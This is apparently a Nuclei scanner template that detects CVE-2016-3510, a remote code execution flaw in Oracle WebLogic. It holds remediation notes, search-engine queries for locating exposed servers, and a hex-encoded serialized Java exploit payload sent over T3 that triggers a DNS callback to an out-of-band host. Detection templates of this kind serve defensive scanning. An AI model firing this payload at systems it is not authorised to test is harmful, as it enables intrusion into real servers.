id: CVE-2016-3510 info: name: Oracle WebLogic Server Java Object Deserialization - Remote Code Execution author: iamnoooob,rootxharsh,pdresearch severity: critical description: | Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586. remediation: | Install the relevant patch as per the advisory provided in the Oracle Critical Patch Update for July 2016. reference: - https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/weblogic.py - http://packetstormsecurity.com/files/152324/Oracle-Weblogic-Server-Deserialization-MarshalledObject-Remote-Code-Execution.html - http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html - http://www.securitytracker.com/id/1036373 - https://www.tenable.com/security/research/tra-2016-21 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-3510 cwe-id: CWE-119 epss-score: 0.03351 epss-percentile: 0.91456 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: oracle product: weblogic_server shodan-query: - product:"oracle weblogic" - http.title:"oracle peoplesoft sign-in" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp variables: start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000" end: "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078" tcp: - inputs: - data: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n" read: 1024 - data: "{{hex_decode(concat('00000460',start,generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex'),end))}}" host: - "{{Hostname}}" - "{{Host}}:7001" read-size: 4 matchers: - type: word part: interactsh_protocol words: - "dns" # digest: 4a0a004730450220249734c4ffaf01327913e598f9c62ff98446ffee85dcdfdb4af8dfb53fe03782022100be0f48fd1c9ffe208aa0dd7ab36cccf7983c13eb3c4d75cb85b7e5573f2b5199:922c64590222798bb761d5b6d8e72950